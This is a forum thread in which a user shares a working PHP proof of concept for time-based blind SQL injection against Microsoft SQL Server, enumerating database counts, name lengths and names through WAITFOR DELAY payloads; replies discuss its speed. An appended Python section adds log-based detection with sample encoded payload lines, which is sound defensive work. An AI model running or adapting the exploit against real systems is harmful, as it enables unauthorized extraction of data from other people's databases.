[SRC] Web Blind SQL Injection (Time Based) POC
04-01-2011, 11:28 AM, (This post was last modified: 04-01-2011, 02:11 PM by fatah.)
Post: #1
[SRC] Web Blind SQL Injection (Time Based) POC
I think many of you already know about this, but I just want to share it with you. I saw that Havij was having problems, and I had only just started learning this yesterday, so I tried it straight away on a legal test site.

Code:
<?php

    $site = "http://www.site.com";
    $path = "/path/to/vuln/page.asp?";
    $param = "param1=Submit&param2=&vulnparam=";

    $timing = 5;
    
    // Initialization
    $length = 0;
    $dbcount = 0;

    echo "Web Blind (Time Based) SQL Injection POC\n";
    echo "by Sesiapa sahaja [at] TBD.My\n\n";

    // Stage 1: guess the number of databases; the guess that triggers the delay is the answer
    foreach(range(0,50) as $n) {
        $inject = "';if (select COUNT(*) from master..sysdatabases) = {$n} waitfor delay '0:0:{$timing}';--";
        $inject = urlencode($inject);

        $url = $site . $path . $param . $inject;

        $time1 = time();
        $body = @file_get_contents($url);
        $time2 = time();

        // time() has whole-second resolution, so the comparison is against the requested delay in seconds
        if (($time2 - $time1) < $timing) {
            //echo "false";
        } else {
            $dbcount = $n; break;
        }
    }

    echo "DB count = {$dbcount}\n";

    // Stage 2: for each database id, guess the length of its name the same way
    foreach(range(0,$dbcount) as $n) {
        foreach(range(0,50) as $i) {
            $inject = "';if (select len(db_name($n))) = {$i} waitfor delay '0:0:{$timing}';--";
            $inject = urlencode($inject);

            $url = $site . $path . $param . $inject;

            $time1 = time();
            $body = @file_get_contents($url);
            $time2 = time();

            if (($time2 - $time1) < $timing) {
                //echo "false";
            } else {
                $length = $i; break;
            }
        }

        echo "db_name({$n}) length={$length}\n";

        // Stage 3: recover the name one lowercase letter at a time
        foreach(range(1,$length) as $index) {
            foreach(range('a','z') as $letter) {
                $inject = "';if (select substring(lower(db_name($n)),$index,1)) = '{$letter}' waitfor delay '0:0:{$timing}';--";
                $inject = urlencode($inject);

                $url = $site . $path . $param . $inject;

                $time1 = time();
                $body = @file_get_contents($url);
                $time2 = time();

                if (($time2 - $time1) < $timing) {
                    //echo "false";
                } else {
                    echo "{$letter}"; break;
                }
            }
        }

        echo "\n"; // newline
    }
?>
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
04-01-2011, 05:51 PM,
Post: #2
RE: [SRC] Web Blind SQL Injection (Time Based) POC
huhu ............ it's MSSQLi, right?? But how long is this going to take to run if you use file_get_contents() ROFL ROFL ROFL ............... If you've ever tried the old hexjector you'd know ROFL ROFL ROFL ROFL ROFL
04-01-2011, 06:39 PM, (This post was last modified: 04-01-2011, 08:07 PM by fatah.)
Post: #3
RE: [SRC] Web Blind SQL Injection (Time Based) POC
Big Grin Yeah, MSSQLi with a string-type parameter.

I made this as a one-time-use thing anyway. As far as I know, blind SQLi has two kinds of attack:
1. True & False - Faster. (Because the page always returned 500, I couldn't use this technique.)
2. Time Based - Slow, and problematic if the connection is sluggish.

file_get_contents() because it was the first thing that came to mind, and the end result page was always 500 Internal Server Error, but at least the SQL statement "waitfor delay" still executed. GayFace
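As an added example (not from the original posts), here is the defender's side of the technique discussed in this thread: detection logic over web server logs. It parses constructed IIS-style lines (the field order is an assumption for the sample), URL-decodes each query parameter (the POC encodes with urlencode, so spaces arrive as '+'), flags any value carrying a T-SQL WAITFOR DELAY payload, and uses the logged response time to tell which probes actually fired, the signal that the "always 500" responses described above do not give.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed log lines (assumed field order: time, client IP, method, URI stem, URI query,
# status, time-taken in ms). They mimic the trail the POC above leaves: one request per guess,
# every response a 500, and a single slow response where the guessed value was right.
SAMPLE_LOG = """\
11:28:01 203.0.113.7 GET /page.asp param1=Submit&param2=&vulnparam=%27%3Bif+%28select+COUNT%28*%29+from+master..sysdatabases%29+%3D+0+waitfor+delay+%270%3A0%3A5%27%3B-- 500 140
11:28:02 203.0.113.7 GET /page.asp param1=Submit&param2=&vulnparam=%27%3Bif+%28select+COUNT%28*%29+from+master..sysdatabases%29+%3D+1+waitfor+delay+%270%3A0%3A5%27%3B-- 500 133
11:28:08 203.0.113.7 GET /page.asp param1=Submit&param2=&vulnparam=%27%3Bif+%28select+COUNT%28*%29+from+master..sysdatabases%29+%3D+2+waitfor+delay+%270%3A0%3A5%27%3B-- 500 5120
11:28:09 198.51.100.4 GET /page.asp param1=Submit&param2=&vulnparam=hello 200 90
"""

# The T-SQL delay primitive the POC relies on; groups are hours, minutes, seconds.
WAITFOR_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)

def parse_line(line):
    """Split one constructed log line into a dict (real IIS/Apache formats need their own parser)."""
    time, ip, method, stem, query, status, taken = line.split(" ")
    return {"time": time, "ip": ip, "method": method, "stem": stem,
            "query": query, "status": int(status), "taken_ms": int(taken)}

def find_time_based_sqli(log_text):
    """One finding per request whose URL-decoded query carries a WAITFOR DELAY payload."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        # parse_qs decodes %xx and turns '+' back into spaces, so the payload reads as sent.
        for name, values in parse_qs(rec["query"], keep_blank_values=True).items():
            for value in values:
                m = WAITFOR_RE.search(value)
                if not m:
                    continue
                h, mnt, s = (int(g) for g in m.groups())
                delay_ms = (h * 3600 + mnt * 60 + s) * 1000
                findings.append({"time": rec["time"], "ip": rec["ip"], "param": name,
                                 "status": rec["status"], "delay_ms": delay_ms,
                                 # response at least as slow as the requested delay: condition was true
                                 "stalled": rec["taken_ms"] >= delay_ms})
    return findings

def summarize_by_ip(findings):
    """Probe and confirmed-probe counts per client IP, for prioritising the alert."""
    summary = defaultdict(lambda: {"probes": 0, "stalled": 0})
    for f in findings:
        summary[f["ip"]]["probes"] += 1
        summary[f["ip"]]["stalled"] += int(f["stalled"])
    return dict(summary)
```

A burst of probes from one IP with only a few stalled responses is the characteristic shape of the enumeration loops in the POC, regardless of whether the application answered 200 or 500.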